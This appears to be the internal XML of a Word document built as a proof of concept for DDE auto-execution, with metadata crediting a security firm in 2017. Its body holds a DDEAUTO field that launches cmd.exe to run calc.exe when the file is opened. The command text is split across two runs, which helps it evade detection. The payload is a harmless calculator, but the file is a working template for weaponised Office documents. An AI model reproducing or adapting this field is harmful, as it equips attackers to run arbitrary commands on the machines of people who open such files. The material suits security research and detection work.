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71" w:rsidRDefault="007065E3">
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="007065E3">
        <w:instrText>DDEAUTO c:\\windows\\sy</w:instrText>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve">stem32\\cmd.exe "/k calc.exe"  </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:t>!Unexpected End of Formula</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B67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B9"/>
    <w:rsid w:val="004D5B2C"/>
    <w:rsid w:val="007065E3"/>
    <w:rsid w:val="00B67B71"/>
    <w:rsid w:val="00B72D59"/>
    <w:rsid w:val="00DB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D2C8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DFAD0854-C113-487D-AB7D-B0D645F1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CBC7-74EB-4ADA-ACC0-3E7BFFAF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Company>Dionach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nzotti</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Mike Manzotti</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-11-10T10:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-10T10:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>